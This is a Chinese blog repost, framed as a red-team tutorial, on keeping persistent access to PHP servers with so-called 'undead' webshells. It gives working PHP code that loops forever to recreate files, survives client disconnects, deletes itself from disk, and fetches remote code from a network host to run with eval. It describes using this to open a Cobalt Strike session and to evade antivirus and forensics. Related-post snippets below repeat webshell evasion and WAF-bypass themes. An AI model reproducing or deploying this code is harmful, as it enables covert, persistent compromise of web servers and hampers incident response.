Php-不死马的权限维持

已于 2022-02-19 20:39:50 修改
阅读量641 收藏 4
点赞数
分类专栏: # 红队技巧 # 权限维持 文章标签: php 开发语言 后端
于 2022-02-18 14:23:43 首次发布
原文链接:https://zhuanlan.zhihu.com/p/420615927
版权

转发自知乎: https://zhuanlan.zhihu.com/p/420615927
侵删

大家在渗透测试中,碰到java的程序,都会打上一个内存马

但是在php的程序中很少有这种webshell/维持方式,/无主文件落地的方式

接下来就让小编带你聊聊,php中不死马的权限维持,其实早在之前比较火

0x01 PHp - 不死马(内存马)

在实战当中,现在很少有人用不死马了,其实可以有效的去用来做一些防护的绕过。也加大了一些溯源的难度,和宿主检测webshell的难度

第一种,

是把木马通过写入的方式一直不停的去写入相关的文件(弊端需要一直请求该地址)

下面是比较简单的代码

<?php
$file = fopen("test.php", "w"); //打开一个文件
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);  //写入一个文件
fclose($file);
?>

当我们去访问这个php文件的时候,会生成一个 test.php的文件,当然也可以添加一个while循环,if判断

<?php
do {
  $filename = 'test.php';
  if(file_exists($filename)) {
    echo "xxx";
  }
  else {
    $file = fopen("test.php", "w");
    $txt = "<?php phpinfo();?>\n";
  fwrite($file, $txt);
  fclose($file);
  }
} while (true);
?>

第二种,

在第一种的基础上增加 几个函数,由php-fgi进程,去运行,达到无主文件落地的一个运行方式

ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
代码如下

<?php
  ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
  set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
  $interval = 5; // 每隔*秒运行
do {
  $filename = 'test.php';
  if(file_exists($filename)) {
    echo "xxx";
  }
  else {
    $file = fopen("test.php", "w");
    $txt = "<?php phpinfo();?>\n";
  fwrite($file, $txt);
  fclose($file);
  }
  sleep($interval);
} while (true);
?>

在这里插入图片描述
在这里插入图片描述

看完上面两种方式,是不是都存在一个弊端,就是还是有文件落地,我们可以不可以做到无文件的落地,答案是肯定可以的

unlink(__FILE__) //删除文件本身
ignore_user_abort(true); //与客户端的长连接
file_get_contents  //把文件读入一个字符串

我们在第二种方式的前提下,进行 语句变种,修改里面文件 代码即可

我们来组装配合下

首先 测试2.php 的dome,这样是成功的,目的是包含远程的txt文件,然后在用eval去执行,有的小伙伴肯定好奇,这样的免杀效果为0,php的免杀对于大家来说应该问题不大吧

<?php
$remote_file = 'http://192.168.3.114:81/test.txt';
$code = file_get_contents($remote_file);
eval($code);
?>

相信大家已经猜测到了什么,我们把如上代码修改,放入第二种方法中,我这边直接powershell 上线 cs

“不死马” 的缺点,如果容器,服务重启,将会断开

明月清风~~
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
风聆RBAC权限管理系统-PHP
06-21
风聆RBAC权限管理系统是一个基于ThinkPHP 5.1的RBAC权限管理系统,实现了基本的权限管理,本系统是基于权限节点进行认证,可控制菜单显示隐藏,基于角色控制权限节点。 风聆RBAC权限管理系统软件架构 1、前端框架:layui 2.5.6 2、后端框架:ThinkPHP 5.1.39 LTS 3、后端界面基于layuimini 风聆RBAC权限管理系统安装教程: 1、搭建开发环境,推荐使用PhpStudy; 2、下载或Git项目代码到本地,将代码拷贝至:E:/phpstudy_pro/www/目录下; 3、通过PhpStudy面板添加网站,并指向项目根目录的public/目录下; 4、新建数据库think_rbac(可自定义数据库名称,然后在config/database.php文件中修改数据库配置),导入数据库文件think_rbac.sql; 5、使用浏览器(推荐chrome浏览器)访问:http://yourdomain.com/admin,默认用户名/密码:admin。 风聆RBAC权限管理系统使用说明: 1、角色管理:添加角色、编辑角色、删除角色、角色授权 2、权限管理:添加权限、编辑权限、删除权限、 3、用户管理:添加用户、编辑用户、删除用户 4、日志管理:登录日志 5、文章管理:模拟菜单,未开发功能
php-process
03-29
关于低版本PHP资源离线安装包,如果安装不成功,需要全部强制安装 php-5.3.3-50.el6_10.x86_64.rpm php-cli-5.3.3-50.el6_10.x86_64.rpm php-common-5.3.3-50.el6_10.x86_64.rpm php-gd-5.3.3-50.el6_10.x86_64.rpm php-ldap-5.3.3-50.el6_10.x86_64.rpm php-mysql-5.3.3-50.el6_10.x86_64.rpm php-pdo-5.3.3-50.el6_10.x86_64.rpm php-process-5.3.3-50.el6_10.x86_64.rpm php-soap-5.3.3-50.el6_10.x86_64.rpm php-xml-5.3.3-50.el6_10.x86_64.rpm 全部安装完成后如果页面登录不了,需要修改session目录的权限
php-7.3.0.tar.gz
12-24
编译 ./configure --prefix=/usr/local/php --exec-prefix=/usr/local/php --bindir=/usr/local/php/bin --sbindir=/usr/local/php/sbin --includedir=/usr/local/php/include --libdir=/usr/local/php/lib/php --mandir=/usr/local/php/php/man --with-config-file-path=/usr/local/php/etc --with-mysql-sock=/var/run/mysql/mysql.sock --with-mcrypt=/usr/include --with-mhash --with-openssl --with-mysql=shared,mysqlnd --with-mysqli=shared,mysqlnd --with-pdo-mysql=shared,mysqlnd --with-gd --with-iconv --with-zlib --enable-zip --enable-inline-optimization --disable-debug --disable-rpath --enable-shared --enable-xml --enable-bcmath --enable-shmop --enable-sysvsem --enable-mbregex --enable-mbstring --enable-ftp --enable-gd-native-ttf --enable-pcntl --enable-sockets --with-xmlrpc --enable-soap --without-pear --with-gettext --enable-session --with-curl --with-jpeg-dir --with-freetype-dir --enable-opcache --enable-fpm --enable-fastcgi --with-fpm-user=www --with-fpm-group=www --without-gdbm --with-mcrypt=/usr/local/apps/libmcrypt --disable-fileinfo 报错:1, **configure: error: system libzip must be upgraded to version >=**0.11。 使用Yum最新版只到0.10,不足以达到要求。 一、先删除libzip yum remove libzip -y SSH执行以上命令,先删除libzip 和 libzip-devel 二、下载安装并手动编译 wget https://nih.at/libzip/libzip-1.2.0.tar.gz tar -zxvf libzip-1.2.0.tar.gz cd libzip-1.2.0 ./configure make && make install 三、(可忽略)另外最新版本请参考官网:https://nih.at/libzip/ 1.5.0的libzip需要cmake wget https://libzip.org/download/libzip-1.5.0.tar.gz tar -zxvf libzip-* cd libzip* mkdir build && cd build && cmake .. && make && make install 报错2: error: off_t undefined; check your library configuration 根据报错信息分析 configure: error: off_t undefined; check your library configuration 未定义的类型 off_t。 off_t 类型是在 头文件 unistd.h中定义的,在32位系统 编程成 long int ,64位系统则编译成 long long int ,这里题主的系统应该是 64位的吧,在进行编译的时候 是默认查找64位的动态链接库,但是默认情况下 centos 的动态链接库配置文件/etc/ld.so.conf里并没有加入搜索路径,这个时候需要将 /usr/local/lib64 /usr/lib64 这些针对64位的库文件路径加进去。 采用下面的方法。 添加搜索路径到配置文件 echo '/usr/local
PHP-TRC20-usdt.zip
09-07
PHP-Tron-开发 创建地址 $ php 演示/NewAddressDemo.php TRX转账及余额查询 $ php 演示/TrxDemo.php Trc20 代币转账、余额查询和事件监控 $ php 演示/Trc20Demo.php Tron 智能合约部署 $ php 演示/DeployContractDemo.php 联络我 更多源码请联系 QQ19816858 帮助 http://sc.hubwiz.com/codebag/tron-php-lib/
宝塔重置密码 mysql_linux宝塔面板安装 宝塔重置密码等常用命令
weixin_35749440的博客
01-20 2307
安装宝塔Centos安装脚本yum install -y wget && wget -O install.sh http://download.bt.cn/install/install.sh && sh install.shUbuntu/Deepin安装脚本wget -O install.sh http://download.bt.cn/install/insta...
php绕过宝塔,Thinkphp绕过宝塔getshell
weixin_35904873的博客
03-27 1271
可以看到直接被拦了,经测试这里是敏感函数字符拦截,大部分有用的敏感函数都被拦了,这里面被拦的是phpinfo()Emmmm,怎么办呢。。。。。直接执行代码不行,那么就写入代码吧,用file_put_contents()函数进行写入。但这里又有一个问题,正常的写入由于请求参数中带有敏感字符一样会被拦,并且使用小执行调用敏感函数的时候也会被拦所以得配合点黑科技,使用特殊小,加URL编码三次url:...
后门权限维持php,DoubleAgent技术:任意进程下代码注入与权限维持
weixin_36012511的博客
03-29 239
概述本文披露一种全新的0day技术,用于代码注入和权限维持。影响范围Windows的所有版本(windows xp到windows 10)所有windows架构(x86和x64)Windows所有权限(system/administrator)每个目标进程,包括特权进程(OS/Antivirus等)DoubeleAgent所利用的是一个未被windows公开的技术,该技术已经存在了15年,所以目前...
PHP内存介绍
派大星的博客
02-28 2076
PHP内存介绍
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 1823
关于PHP不死马的分析和总结
不死马的利用与克制(基于条件竞争)及变种不死马
Welcome To Myon'Blog !
10-06 1955
不死马即内存,它会写进进程里,并且无限地在指定目录中生成木文件这里以PHP不死马为例上面代码即为最简单的不死马,其目的是创建一个名为".test.php"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。关于代码的详细解释:设置PHP脚本忽略用户中止连接,即使用户在浏览器中停止加载页面,脚本仍然会继续执行。设置脚本执行时间限制为0,意味着脚本可以无限期地运行,不会被PHP的执行时间限制所中断。
AWD WAF watch bird 文件监控 不死马下载
10-06
1.该waf 1000多行,可防御一句话木 ...4 每个防护的php前加入 <?php include_once "/var/www/html/watchbird.php" ?> 5.访问任意, 如xxx/index.php?watchbird=ui,xxx/,xx/watchbird.php?watchbird=ui,设置waf.so路径
一淘模板分析PHP内存木病毒原理
qq_29701691的博客
10-18 1582
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。内存木,就是在内存中运行的木病毒,没有代码实体。内存木有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。就算被释放的木被识破后删除,还会产生同样的文件。干掉进程后,删除释放的木文件。
宝塔安装php扩展成功无效
yxconline的博客
07-06 1398
这中情况多半是编译环境有问题,比如说安装 exif 时,可能就是服务器编译器的问题,我们可以先试试下面的代码先安装编译需要的环境(ubuntu或debian请自行更改为apt-get) yum -y install gcc-c++ yum -y install glibc-headers yum -y install m4 yum -y install autoconf 如以上方法无法解决,可尝试卸载PHP,进入服务器ssh输入bt然后选择修复面板程序,随后再重装PHP进行安装(最好使用编译安装) ..
宝塔实测搭建php通用权限管理系统源码
主题模板站的博客
01-19 671
如果程序执行时报错,很大概率是php版本问题,推荐使用php5.6版本就可以了,或者删除App下面Runtime文件夹清理一下缓存。数据库建表的时候选 uft8-general-ci 编码格式,然后点开sql文件,把sql文件复制进去,执行就可以了。下载源码,宝塔添加一个站点,创建一个数据库,把本地的sql文件导入到Mysql数据库中。修改App/Common/Conf/db.php中的数据库名称,账号密码改成自己的。压缩源码文件,上传到宝塔的网站根目录中,解压缩。Mysql 5.5及以上版本。
php一句话木免杀
最新发布
qq_58683895的博客
11-21 1265
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
不死马
strider1123的博客
08-01 112
不死马感觉挺有用的,先了解了解,早晚会用到 先来了解下不死马不死”的原理 不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木文件 来看一个普通的不死马 <?php set_time_limit(0); //用来让这个php文件能永久执行,否则会有...
渗透测试-不死马的创建和查杀
lza20001103的博客
09-01 2125
不死马的创建和查杀 文章目录不死马的创建和查杀0x00 创建0x01 查看0x02 查杀root用户角度的查杀:重启web服务。其他用户的查杀: 0x00 创建 md5加密密码: 代码: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e4
7.awd不死马权限维持及变种
山兔的博客
09-22 2402
不死马又叫内存,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。 不死马.php—>上传到server—>server执行文件—>server本地无限循环生成 (一句话.php不死马生成的一句话木可以自定义。 <?php ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行 set_time_limit(0); //设置脚本的最大执行时间,0代表无限制 unlink(__FILE__); //删除文件本身
关于PHP的webshell免杀小结
小王的储物间
02-23 899
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
php扩展php-ffmpeg安装方法
10-20
安装php-ffmpeg扩展需要以下步骤: 1. 安装FFmpeg库 首先需要安装FFmpeg库,可以通过以下命令在Ubuntu系统上进行安装: ``` sudo apt-get install ffmpeg ``` 如果你使用的是其他操作系统,可以参考FFmpeg官方文档进行安装。 2. 下载php-ffmpeg源码 可以从php-ffmpeg的GitHub仓库中下载源码:https://github.com/PHP-FFMpeg/PHP-FFMpeg 3. 编译安装php-ffmpeg扩展 进入php-ffmpeg源码目录,执行以下命令进行编译安装: ``` phpize ./configure make sudo make install ``` 4. 配置php.ini文件 在php.ini文件中添加以下配置: ``` extension=ffmpeg.so ``` 5. 重启Web服务器 重启Web服务器使配置生效。 以上就是安装php-ffmpeg扩展的步骤。如果你遇到了问题,可以参考php-ffmpeg的官方文档或者在相关社区寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值